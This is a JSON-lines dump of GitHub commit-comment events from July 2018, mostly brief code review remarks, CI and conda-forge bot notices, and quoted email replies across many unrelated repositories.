{"id":"7908618827","type":"CommitCommentEvent","actor":{"login":"naiyt"},"repo":{"name":"seanrcollings/DevCampCourse"},"payload":{"comment":{"id":29571367,"position":32,"line":32,"path":"ReactCourse/madlib/src/components/card.js","commit_id":"95eafbd7d209cdc1068a5b4d20f8ec2799cd4934","created_at":"2018-07-02T19:54:37Z","updated_at":"2018-07-02T19:54:37Z","author_association":"NONE","body":"There are a few other ways to do this that don't require you to do the `.bind(this)` in the constructor. Let me know if you want to know those sometime."}},"created_at":"2018-07-02T19:54:37Z"}
{"id":"7908620700","type":"CommitCommentEvent","actor":{"login":"justinmk"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":29571372,"position":5,"line":205,"path":"src/nvim/tui/tui.c","commit_id":"4a83b64777b22933de186665ddb4d0570675c667","created_at":"2018-07-02T19:55:04Z","updated_at":"2018-07-02T19:55:04Z","author_association":"MEMBER","body":"`termname` is not the same thing as `$TERM`. Would require a refactor. If anyone wants to, ok, but would be better to spend that time merging some PRs :)"}},"created_at":"2018-07-02T19:55:04Z"}
{"id":"7908620950","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29571373,"position":null,"line":null,"path":null,"commit_id":"d1d00f821a23b3dd61405a32b2a879e10a392b65","created_at":"2018-07-02T19:55:08Z","updated_at":"2018-07-02T19:55:08Z","author_association":"COLLABORATOR","body":"<h3>add missing LICENSE files to tooling packages</h3>\n\nPreview: <strong><a href='https://17810-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://17810-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://17810-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-02T19:55:08Z"}
{"id":"7908621106","type":"CommitCommentEvent","actor":{"login":"brenopoggiali"},"repo":{"name":"brenopoggiali/BrandStockControl"},"payload":{"comment":{"id":29571374,"position":null,"line":null,"path":null,"commit_id":"7b64038785302cd96355583118fbddbf3779915b","created_at":"2018-07-02T19:55:10Z","updated_at":"2018-07-02T19:55:10Z","author_association":"OWNER","body":"These files can be executed in Apache or Wamp/Lamp/Mamp. Just save it in the respective folder and open the web system in localhost."}},"created_at":"2018-07-02T19:55:10Z"}
{"id":"7908622272","type":"CommitCommentEvent","actor":{"login":"naiyt"},"repo":{"name":"seanrcollings/DevCampCourse"},"payload":{"comment":{"id":29571378,"position":69,"line":69,"path":"ReactCourse/madlib/src/components/card.js","commit_id":"95eafbd7d209cdc1068a5b4d20f8ec2799cd4934","created_at":"2018-07-02T19:55:26Z","updated_at":"2018-07-02T19:55:26Z","author_association":"NONE","body":"Random style thing, but usually in React we like to not have the space after the equals:\r\n\r\n```\r\n<form onSubmit={this.handleFormSubmit} className='card'>\r\n```"}},"created_at":"2018-07-02T19:55:26Z"}
{"id":"7908625412","type":"CommitCommentEvent","actor":{"login":"naiyt"},"repo":{"name":"seanrcollings/DevCampCourse"},"payload":{"comment":{"id":29571385,"position":10,"line":10,"path":"ReactCourse/madlib/src/components/content.js","commit_id":"95eafbd7d209cdc1068a5b4d20f8ec2799cd4934","created_at":"2018-07-02T19:56:09Z","updated_at":"2018-07-02T19:56:09Z","author_association":"NONE","body":"lol"}},"created_at":"2018-07-02T19:56:09Z"}
{"id":"7908625791","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29571386,"position":null,"line":null,"path":null,"commit_id":"33ba6010241b2f3c0fdb9fbf31b1db802e397500","created_at":"2018-07-02T19:56:14Z","updated_at":"2018-07-02T19:56:14Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-32](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-32).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-32-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-02T19:56:14Z"}
{"id":"7908627045","type":"CommitCommentEvent","actor":{"login":"chrissnell"},"repo":{"name":"DirectXMan12/k8s-prometheus-adapter"},"payload":{"comment":{"id":29571389,"position":3,"line":23,"path":"docs/walkthrough.md","commit_id":"fb8a0c50b316b35f7dfe63dc3032186799591c3b","created_at":"2018-07-02T19:56:30Z","updated_at":"2018-07-02T19:56:30Z","author_association":"NONE","body":"@DirectXMan12 - Can you elaborate on what you mean by `Make sure that you've properly configured metric-server`?  \r\n\r\nDo you you mean that I **merely have to set up a working metrics-server** to allow custom metrics and CPU autoscaling to co-exist?\r\n\r\n....or do you mean that there is a **specific configuration** for metrics-server that needs to be made for these two to co-exist?"}},"created_at":"2018-07-02T19:56:30Z"}
{"id":"7908628541","type":"CommitCommentEvent","actor":{"login":"naiyt"},"repo":{"name":"seanrcollings/DevCampCourse"},"payload":{"comment":{"id":29571391,"position":10,"line":10,"path":"ReactCourse/madlib/src/components/home.js","commit_id":"95eafbd7d209cdc1068a5b4d20f8ec2799cd4934","created_at":"2018-07-02T19:56:50Z","updated_at":"2018-07-02T19:56:50Z","author_association":"NONE","body":"`<Header />` rather than `{ Header() }`"}},"created_at":"2018-07-02T19:56:50Z"}
{"id":"7908628967","type":"CommitCommentEvent","actor":{"login":"ConnorZimmerman"},"repo":{"name":"EmilChoparinov/Chip-Challenge"},"payload":{"comment":{"id":29571393,"position":108,"line":109,"path":"apps/game/AI_2.py","commit_id":"868c731257bdec4a5bcaa5d8dc6073ab0f1a2561","created_at":"2018-07-02T19:56:55Z","updated_at":"2018-07-02T19:56:55Z","author_association":"COLLABORATOR","body":"Lol, surely there are more conventional ways for us to communicate hahah\n\nOn Mon, Jul 2, 2018 at 12:39 PM, ale <notifications@github.com> wrote:\n\n> From phone,\n> So can’t comment on spot!\n> Sometimes you need something easy to spit :)\n>\n> How is everything going? :)\n>\n> Sent from my iPhone\n>\n> > On Jul 2, 2018, at 11:50, Emil Choparinov <notifications@github.com>\n> wrote:\n> >\n> > 🤔\n> >\n> > —\n> > You are receiving this because you authored the thread.\n>\n> > Reply to this email directly, view it on GitHub, or mute the thread.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/EmilChoparinov/Chip-Challenge/commit/868c731257bdec4a5bcaa5d8dc6073ab0f1a2561#commitcomment-29571234>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AajGRZdMH17eLEFMKkl-NP5mx-vGdV9Jks5uCnbcgaJpZM4U_x6d>\n> .\n>\n>\n> ------------------------------\n>\n> This email has been scanned for spam and viruses by Proofpoint Essentials.\n> Click here\n> <https://us4.proofpointessentials.com/index01.php?mod_id=11&mod_option=logitem&mail_id=1530560350-PF4PwHoP_jpZ&r_address=connor.zimmerman%40handlefin.com&report=1>\n> to report this email as spam.\n>\n>\n"}},"created_at":"2018-07-02T19:56:55Z"}
{"id":"7908629169","type":"CommitCommentEvent","actor":{"login":"willan123"},"repo":{"name":"uwblueprint/website"},"payload":{"comment":{"id":29571394,"position":4,"line":25,"path":"src/app/projects-page/projects-page.component.html","commit_id":"ef8fa7a88a7db393d0c6f23f98c0b5bf6cf630f4","created_at":"2018-07-02T19:56:58Z","updated_at":"2018-07-02T19:56:58Z","author_association":"CONTRIBUTOR","body":"Done"}},"created_at":"2018-07-02T19:56:58Z"}
{"id":"7908630341","type":"CommitCommentEvent","actor":{"login":"wethegreenpeople"},"repo":{"name":"SUNsung/fap"},"payload":{"comment":{"id":29571396,"position":null,"line":null,"path":null,"commit_id":"de4edb840f1e9e357cc52139120196083b9a160c","created_at":"2018-07-02T19:57:14Z","updated_at":"2018-07-02T19:57:14Z","author_association":"NONE","body":"What is this"}},"created_at":"2018-07-02T19:57:14Z"}
{"id":"7908634899","type":"CommitCommentEvent","actor":{"login":"jhoeller"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29571410,"position":15,"line":77,"path":"spring-beans/src/main/java/org/springframework/beans/factory/support/DefaultSingletonBeanRegistry.java","commit_id":"8a56db6e4ebc2db71fc0524bbeea22b7acae7d2a","created_at":"2018-07-02T19:58:14Z","updated_at":"2018-07-02T19:58:14Z","author_association":"CONTRIBUTOR","body":"Breaks `AbstractBeanFactory` in which respect? It's effectively an internal refactoring, moving the `logger` field up the class hierarchy but still initializing it for the concrete class. Unless you were to declare classes into that core Spring package yourself, expecting package-level access to such fields, you shouldn't see any side effects. Am I missing something?"}},"created_at":"2018-07-02T19:58:14Z"}
{"id":"7908640363","type":"CommitCommentEvent","actor":{"login":"ocket8888"},"repo":{"name":"ocket8888/mgl"},"payload":{"comment":{"id":29571420,"position":null,"line":null,"path":null,"commit_id":"99df5a8a80cd33c90f76217e4e8d5bbcb78cd6af","created_at":"2018-07-02T19:59:29Z","updated_at":"2018-07-02T19:59:29Z","author_association":"OWNER","body":"Oh, I'm definitely not concerned about wasting time on this; I'm actually learning quite a bit."}},"created_at":"2018-07-02T19:59:29Z"}
{"id":"7908640661","type":"CommitCommentEvent","actor":{"login":"naiyt"},"repo":{"name":"seanrcollings/DevCampCourse"},"payload":{"comment":{"id":29571421,"position":6,"line":6,"path":"ReactCourse/madlib/src/components/content.js","commit_id":"58a358ddfd4d31cc8a6b94d407a0f9c36d155d9b","created_at":"2018-07-02T19:59:32Z","updated_at":"2018-07-02T19:59:32Z","author_association":"NONE","body":"Is `this.count` a value you could store in the state rather than directly on `this`?"}},"created_at":"2018-07-02T19:59:32Z"}
{"id":"7908641708","type":"CommitCommentEvent","actor":{"login":"fcdiomede"},"repo":{"name":"fcdiomede/Dataquest_Projects"},"payload":{"comment":{"id":29571424,"position":null,"line":null,"path":null,"commit_id":"4ba43f26d23918c68b0c91b1baecf6717c1a5c3c","created_at":"2018-07-02T19:59:46Z","updated_at":"2018-07-02T19:59:46Z","author_association":"OWNER","body":"Moving file into associated project foler"}},"created_at":"2018-07-02T19:59:46Z"}
{"id":"7904101283","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29560451,"position":null,"line":null,"path":null,"commit_id":"81b29903d859ad8af1c752226be9ee51fa829957","created_at":"2018-07-02T02:01:39Z","updated_at":"2018-07-02T02:01:39Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.197`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/197) :tada:"}},"created_at":"2018-07-02T02:01:39Z"}
{"id":"7904102023","type":"CommitCommentEvent","actor":{"login":"altendky"},"repo":{"name":"ebroecker/canmatrix"},"payload":{"comment":{"id":29560453,"position":102,"line":249,"path":"canmatrix/canmatrix.py","commit_id":"a8893523319c4ede32e59ee19bf8420095945e41","created_at":"2018-07-02T02:01:58Z","updated_at":"2018-07-02T02:01:58Z","author_association":"COLLABORATOR","body":"Alrighty, got a first pass at a converter decorator with a PR uploaded (https://github.com/python-attrs/attrs/pull/404).  It's definitely a work in progress needing at least doc updates even if the code passes muster."}},"created_at":"2018-07-02T02:01:58Z"}
{"id":"7904103350","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29560455,"position":null,"line":null,"path":null,"commit_id":"81b29903d859ad8af1c752226be9ee51fa829957","created_at":"2018-07-02T02:02:35Z","updated_at":"2018-07-02T02:02:35Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.298`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/398955138) :tada:"}},"created_at":"2018-07-02T02:02:35Z"}
{"id":"7904103654","type":"CommitCommentEvent","actor":{"login":"thomas-hervey"},"repo":{"name":"openstreetmap/iD"},"payload":{"comment":{"id":29560456,"position":null,"line":null,"path":null,"commit_id":"229484a940eeb1d8ef08495c39642276c599c323","created_at":"2018-07-02T02:02:42Z","updated_at":"2018-07-02T02:02:42Z","author_association":"COLLABORATOR","body":"@bhousel these are great cleaning updates. To clarify, the _seenEntity cache will hold all entities seen, notes and osm alike, correct?"}},"created_at":"2018-07-02T02:02:42Z"}
{"id":"7904112995","type":"CommitCommentEvent","actor":{"login":"Quwenqian"},"repo":{"name":"Quwenqian/BYSJ-PatientAndDoctor"},"payload":{"comment":{"id":29560464,"position":9,"line":9,"path":"README.md","commit_id":"bc07f00f4c3d6afcb803f917427302209f8ded9e","created_at":"2018-07-02T02:06:53Z","updated_at":"2018-07-02T02:06:53Z","author_association":"OWNER","body":"https://github.com/Quwenqian/BYSJ-PatientAndDoctor/blob/master/img.png"}},"created_at":"2018-07-02T02:06:53Z"}
{"id":"7904113446","type":"CommitCommentEvent","actor":{"login":"Quwenqian"},"repo":{"name":"Quwenqian/BYSJ-PatientAndDoctor"},"payload":{"comment":{"id":29560465,"position":null,"line":null,"path":null,"commit_id":"bc07f00f4c3d6afcb803f917427302209f8ded9e","created_at":"2018-07-02T02:07:06Z","updated_at":"2018-07-02T02:07:06Z","author_association":"OWNER","body":"https://github.com/Quwenqian/BYSJ-PatientAndDoctor/blob/master/img.png"}},"created_at":"2018-07-02T02:07:06Z"}
{"id":"7904126712","type":"CommitCommentEvent","actor":{"login":"zephraph"},"repo":{"name":"artsy/reaction"},"payload":{"comment":{"id":29560483,"position":25,"line":74,"path":"src/Styleguide/Components/Lightbox.tsx","commit_id":"30eef94a9a154dccc611b5b83c34a0d6b6ac17eb","created_at":"2018-07-02T02:13:09Z","updated_at":"2018-07-02T02:13:09Z","author_association":"CONTRIBUTOR","body":"I did. There are no other instances of `space` and the only other instance of `color` is in the color preview story. In that particular case though, it needs to access `themeProps` anyway so I figure it's best to just leave it be. "}},"created_at":"2018-07-02T02:13:09Z"}
{"id":"7904127798","type":"CommitCommentEvent","actor":{"login":"lianshengquan"},"repo":{"name":"lianshengquan/mytest"},"payload":{"comment":{"id":29560488,"position":null,"line":null,"path":null,"commit_id":"57e485da2745fa54ea9023597fa3d803a3e53226","created_at":"2018-07-02T02:13:42Z","updated_at":"2018-07-02T02:13:42Z","author_association":"OWNER","body":"最后一个文件"}},"created_at":"2018-07-02T02:13:42Z"}
{"id":"7904129701","type":"CommitCommentEvent","actor":{"login":"WaLLy3K"},"repo":{"name":"pi-hole/pi-hole"},"payload":{"comment":{"id":29560489,"position":null,"line":null,"path":null,"commit_id":"f8680520629692a35096e60f8cf8da2d219d8653","created_at":"2018-07-02T02:14:40Z","updated_at":"2018-07-02T02:14:40Z","author_association":"MEMBER","body":"I just noticed this on my install today and went to fix it; thanks for already doing it @Mcat12 :heart: "}},"created_at":"2018-07-02T02:14:40Z"}
{"id":"7904140358","type":"CommitCommentEvent","actor":{"login":"AkimotoAkari"},"repo":{"name":"ice1000/ice1000.github.io"},"payload":{"comment":{"id":29560503,"position":null,"line":null,"path":null,"commit_id":"c96a9bef2bac43748eca898d7b47e77f984dd979","created_at":"2018-07-02T02:19:37Z","updated_at":"2018-07-02T02:19:37Z","author_association":"COLLABORATOR","body":"Gem source\n\n     ----- Original Message -----\n From: Tesla Ice Zhang <notifications@github.com>\n To: ice1000/ice1000.github.io <ice1000.github.io@noreply.github.com> \nCc: Akimoto Akari <mahoo2d@yahoo.co.jp>; Author <author@noreply.github.com>\n Date: 2018/7/1, Sun 02:43\n Subject: Re: [ice1000/ice1000.github.io] Changed source and I want to hide it (c96a9be)\n   \nHide wat?—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub, or mute the thread. \n\n   \n"}},"created_at":"2018-07-02T02:19:37Z"}
{"id":"7904140678","type":"CommitCommentEvent","actor":{"login":"shin321"},"repo":{"name":"shin321/TIL"},"payload":{"comment":{"id":29560504,"position":null,"line":null,"path":null,"commit_id":"9a7caa2fe705f6b753c5a420950ff9dd2482ec99","created_at":"2018-07-02T02:19:46Z","updated_at":"2018-07-02T02:19:46Z","author_association":"OWNER","body":"comment test"}},"created_at":"2018-07-02T02:19:46Z"}
{"id":"7904140882","type":"CommitCommentEvent","actor":{"login":"jaesmon"},"repo":{"name":"jaesmon/inmobiliaria-techo_Re"},"payload":{"comment":{"id":29560506,"position":null,"line":null,"path":null,"commit_id":"ea1e0a7ab600a6114e306e9a37adb42bc5d52c92","created_at":"2018-07-02T02:19:51Z","updated_at":"2018-07-02T02:19:51Z","author_association":"OWNER","body":"b"}},"created_at":"2018-07-02T02:19:51Z"}
{"id":"7904159983","type":"CommitCommentEvent","actor":{"login":"jiangxin"},"repo":{"name":"jiangxin/git"},"payload":{"comment":{"id":29560525,"position":1737,"line":2549,"path":"po/zh_CN.po","commit_id":"fd8cb379022fc6f5c6d71d12d10c9388b9f5841c","created_at":"2018-07-02T02:28:20Z","updated_at":"2018-07-02T02:28:20Z","author_association":"OWNER","body":"通过 t6043 的 10d 测试用例，模拟该冲突场景，做出如下翻译：\r\n\r\n    \"拒绝在 '%s' 处失去未跟踪文件，即使它存在于重命名中。\""}},"created_at":"2018-07-02T02:28:20Z"}
{"id":"7904160134","type":"CommitCommentEvent","actor":{"login":"armstrong-gun"},"repo":{"name":"armstrong-gun/test"},"payload":{"comment":{"id":29560526,"position":null,"line":null,"path":null,"commit_id":"fc5e6b065ee0f2820ca828c39f0ff1917368610e","created_at":"2018-07-02T02:28:24Z","updated_at":"2018-07-02T02:28:24Z","author_association":"OWNER","body":"写的真棒\r\n"}},"created_at":"2018-07-02T02:28:24Z"}
{"id":"7904161305","type":"CommitCommentEvent","actor":{"login":"jiangxin"},"repo":{"name":"jiangxin/git"},"payload":{"comment":{"id":29560527,"position":1748,"line":2560,"path":"po/zh_CN.po","commit_id":"fd8cb379022fc6f5c6d71d12d10c9388b9f5841c","created_at":"2018-07-02T02:28:55Z","updated_at":"2018-07-02T02:28:55Z","author_association":"OWNER","body":"好"}},"created_at":"2018-07-02T02:28:55Z"}
{"id":"7904163295","type":"CommitCommentEvent","actor":{"login":"jiangxin"},"repo":{"name":"jiangxin/git"},"payload":{"comment":{"id":29560531,"position":1496,"line":2327,"path":"po/zh_CN.po","commit_id":"fd8cb379022fc6f5c6d71d12d10c9388b9f5841c","created_at":"2018-07-02T02:29:37Z","updated_at":"2018-07-02T02:29:37Z","author_association":"OWNER","body":"感谢"}},"created_at":"2018-07-02T02:29:37Z"}
{"id":"7904168406","type":"CommitCommentEvent","actor":{"login":"jiangxin"},"repo":{"name":"jiangxin/git"},"payload":{"comment":{"id":29560539,"position":1339,"line":2096,"path":"po/zh_CN.po","commit_id":"fd8cb379022fc6f5c6d71d12d10c9388b9f5841c","created_at":"2018-07-02T02:31:46Z","updated_at":"2018-07-02T02:31:46Z","author_association":"OWNER","body":"google 搜索，协同的条目比协作多。参考 https://baike.baidu.com/item/协同"}},"created_at":"2018-07-02T02:31:46Z"}
{"id":"7904171494","type":"CommitCommentEvent","actor":{"login":"damassi"},"repo":{"name":"artsy/reaction"},"payload":{"comment":{"id":29560544,"position":25,"line":74,"path":"src/Styleguide/Components/Lightbox.tsx","commit_id":"30eef94a9a154dccc611b5b83c34a0d6b6ac17eb","created_at":"2018-07-02T02:33:06Z","updated_at":"2018-07-02T02:33:06Z","author_association":"MEMBER","body":"cool cool - I was thinking we did pretty good not using the props in css code everywhere so thats good to hear. "}},"created_at":"2018-07-02T02:33:06Z"}
{"id":"7904185278","type":"CommitCommentEvent","actor":{"login":"natanbc"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29560564,"position":null,"line":null,"path":null,"commit_id":"1b14ce93cf8ca3d7b5d431fb008d82fd72d98b1f","created_at":"2018-07-02T02:39:01Z","updated_at":"2018-07-02T02:39:01Z","author_association":"MEMBER","body":"%%"}},"created_at":"2018-07-02T02:39:01Z"}
{"id":"7904189906","type":"CommitCommentEvent","actor":{"login":"asterite"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":29560569,"position":5,"line":78,"path":"src/openssl/ssl/context.cr","commit_id":"080d476240bf6afe9c15fe66145a30312322506d","created_at":"2018-07-02T02:41:13Z","updated_at":"2018-07-02T02:41:13Z","author_association":"CONTRIBUTOR","body":"No need to comment how the language works :-) "}},"created_at":"2018-07-02T02:41:13Z"}
{"id":"7904191816","type":"CommitCommentEvent","actor":{"login":"danny1000008"},"repo":{"name":"danny1000008/bond"},"payload":{"comment":{"id":29560571,"position":97,"line":189,"path":"bond.py","commit_id":"ca2c1edd018a40c82bc3c62b97f715b2ddec8aa8","created_at":"2018-07-02T02:42:10Z","updated_at":"2018-07-02T02:42:10Z","author_association":"OWNER","body":"You’re right, I used the main method for testing the script from the shell.\nI’ll take it out in the next refactor.\n\nThanks very much for all the great suggestions!\n\n\nDanny\n\nOn Sun, Jul 1, 2018 at 7:53 AM Andrew <notifications@github.com> wrote:\n\n> Is this main method needed? I have a hunch this is dead code...\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/danny1000008/bond/commit/ca2c1edd018a40c82bc3c62b97f715b2ddec8aa8#commitcomment-29557903>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Ac5GVxQD-fznKbRYGwbSQo-rfYm-nGyFks5uCMZXgaJpZM4U-UA_>\n> .\n>\n"}},"created_at":"2018-07-02T02:42:10Z"}
{"id":"7904192167","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29560573,"position":null,"line":null,"path":null,"commit_id":"295395c680402978cc61f42aa0e156dd59df3b79","created_at":"2018-07-02T02:42:20Z","updated_at":"2018-07-02T02:42:20Z","author_association":"NONE","body":"This fails shader compliance on my end with an Nvidia GPU -\r\n\r\nhttps://hastebin.com/jemupipuyu.sql\r\n\r\nAnother error that can pop up - in/out being required for 'smooth'."}},"created_at":"2018-07-02T02:42:20Z"}
{"id":"7904193403","type":"CommitCommentEvent","actor":{"login":"Z4ck404"},"repo":{"name":"Z4ck404/INSEA_MATCH"},"payload":{"comment":{"id":29560575,"position":5,"line":5,"path":"tools/getIP.py","commit_id":"ef4c989c3c3cbcd3eb4001615704212564ec375b","created_at":"2018-07-02T02:42:57Z","updated_at":"2018-07-02T02:42:57Z","author_association":"OWNER","body":"IP = s.getsockname()[0] \r\n#pour obtenir l'adress ip de votre la machine executant le script server"}},"created_at":"2018-07-02T02:42:57Z"}
{"id":"7904204521","type":"CommitCommentEvent","actor":{"login":"anindha"},"repo":{"name":"udacity/ud851-Exercises"},"payload":{"comment":{"id":29560600,"position":null,"line":null,"path":null,"commit_id":"832928c45e265513de5f33f9d1abf1c47b79064a","created_at":"2018-07-02T02:48:02Z","updated_at":"2018-07-02T02:48:02Z","author_association":"NONE","body":"`.appendQueryParameter(\"q\", addressString);` instead of `.query(addressString);` also works."}},"created_at":"2018-07-02T02:48:02Z"}
{"id":"7904208030","type":"CommitCommentEvent","actor":{"login":"tacianoamorim"},"repo":{"name":"tacianoamorim/footline"},"payload":{"comment":{"id":29560605,"position":null,"line":null,"path":null,"commit_id":"5a2cb03b35487c7b29060ec002178fb25e11c743","created_at":"2018-07-02T02:49:38Z","updated_at":"2018-07-02T02:49:38Z","author_association":"OWNER","body":"Aprovado"}},"created_at":"2018-07-02T02:49:38Z"}
{"id":"7904211699","type":"CommitCommentEvent","actor":{"login":"ronf"},"repo":{"name":"ronf/asyncssh"},"payload":{"comment":{"id":29560613,"position":4,"line":211,"path":"tests/server.py","commit_id":"6a92930e00f3bbc67d9cdf66816917e64f2450e9","created_at":"2018-07-02T02:51:18Z","updated_at":"2018-07-02T02:51:18Z","author_association":"OWNER","body":"Sorry, it looks like I missed one place which still called the unpatched getnameinfo() in the unit tests, and that caused a problem running the unit tests on Windows. I've checked in an update to fix this (f938e45)."}},"created_at":"2018-07-02T02:51:18Z"}
{"id":"7904216471","type":"CommitCommentEvent","actor":{"login":"rongpingai"},"repo":{"name":"rongpingai/test"},"payload":{"comment":{"id":29560625,"position":4,"line":3,"path":"README.md","commit_id":"d15316af49059e018bfbaecf779c1e050f9ad126","created_at":"2018-07-02T02:53:29Z","updated_at":"2018-07-02T02:53:29Z","author_association":"OWNER","body":"sdlk\r\nasjldfjasljf\r\nasdlkfjdsldfjsalkf"}},"created_at":"2018-07-02T02:53:29Z"}
{"id":"7904221629","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pastel-feedstock"},"payload":{"comment":{"id":29560633,"position":null,"line":null,"path":null,"commit_id":"17ef0f9cab4d9c3d3947819dc7ad7e042e22ab46","created_at":"2018-07-02T02:55:41Z","updated_at":"2018-07-02T02:55:41Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-02T02:55:41Z"}
{"id":"7904223306","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-storr-feedstock"},"payload":{"comment":{"id":29560635,"position":null,"line":null,"path":null,"commit_id":"548f0d665cea2be66640f2dfd8b9ce769b26326d","created_at":"2018-07-02T02:56:22Z","updated_at":"2018-07-02T02:56:22Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @conoria were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @conoria were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-02T02:56:22Z"}
{"id":"7904224670","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-tfestimators-feedstock"},"payload":{"comment":{"id":29560638,"position":null,"line":null,"path":null,"commit_id":"ee5ade2e1d2059738297e1fe3a8e2294cc81f36f","created_at":"2018-07-02T02:56:55Z","updated_at":"2018-07-02T02:56:55Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @stevierene82 were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-02T02:56:55Z"}
{"id":"7904226014","type":"CommitCommentEvent","actor":{"login":"mtamma"},"repo":{"name":"mtamma/Alt-Tab---Node.JS-Coding-Challenge-Public"},"payload":{"comment":{"id":29560640,"position":27,"line":29,"path":"modules/account/controllers/account.profile.controller.js","commit_id":"f8319c4709c275b0060121626526424c87a14823","created_at":"2018-07-02T02:57:31Z","updated_at":"2018-07-02T02:57:31Z","author_association":"OWNER","body":"double semi-colon"}},"created_at":"2018-07-02T02:57:31Z"}
{"id":"7904226188","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-tinytex-feedstock"},"payload":{"comment":{"id":29560641,"position":null,"line":null,"path":null,"commit_id":"40a029ad523e855305413544337996a081a325c7","created_at":"2018-07-02T02:57:37Z","updated_at":"2018-07-02T02:57:37Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @conoria were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @conoria were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-02T02:57:37Z"}
{"id":"7904229577","type":"CommitCommentEvent","actor":{"login":"gitzhm0528"},"repo":{"name":"gitzhm0528/ConfigServer"},"payload":{"comment":{"id":29560649,"position":null,"line":null,"path":null,"commit_id":"b213eb138239e4323f01f640339c0001220abec4","created_at":"2018-07-02T02:59:09Z","updated_at":"2018-07-02T02:59:09Z","author_association":"OWNER","body":"添加name属性"}},"created_at":"2018-07-02T02:59:09Z"}
{"id":"7904229855","type":"CommitCommentEvent","actor":{"login":"yeban"},"repo":{"name":"wurmlab/sequenceserver"},"payload":{"comment":{"id":29560650,"position":8,"line":8,"path":"Dockerfile","commit_id":"e3df71c72dab36327053ba5337c9c4e47beb771f","created_at":"2018-07-02T02:59:15Z","updated_at":"2018-07-02T02:59:15Z","author_association":"MEMBER","body":"Thanks for reviewing 😃 "}},"created_at":"2018-07-02T02:59:15Z"}
